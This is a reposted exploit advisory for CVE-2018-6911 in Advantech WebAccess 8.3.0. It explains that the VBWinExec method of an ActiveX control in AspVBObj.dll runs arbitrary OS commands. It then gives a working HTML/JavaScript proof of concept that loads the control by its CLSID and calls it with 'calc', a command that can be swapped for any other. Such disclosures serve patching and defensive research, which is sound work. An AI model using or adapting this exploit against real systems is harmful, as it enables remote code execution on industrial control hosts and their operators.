Advantech WebAccess 8.3.0 - Remote Code Execution

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Advantech WebAccess 8.3.0 - Remote Code Execution

来源：wassline@gmail.com 作者：Asrir 发布时间：2018-02-26

Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution

Discovered by: Nassim Asrir

Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/

CVE: CVE-2018-6911

Tested on: IE11 / Win10

Technical Details:
==================

The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.

Vulnerable File: C:\WebAccess\Node\AspVBObj.dll

Vulnerable Function: VBWinExec

Vulnerable Class: Include

Class Include
GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
Number of Interfaces: 1
Default Interface: _Include
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False

The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command.

Function VBWinExec (
ByRef command As String
)

Exploit:
========

<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
<BODY>
<object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>

<SCRIPT>

function exploit()
{

     rce.VBWinExec("calc")


}

</SCRIPT>
<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>
</body>
</HTML>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告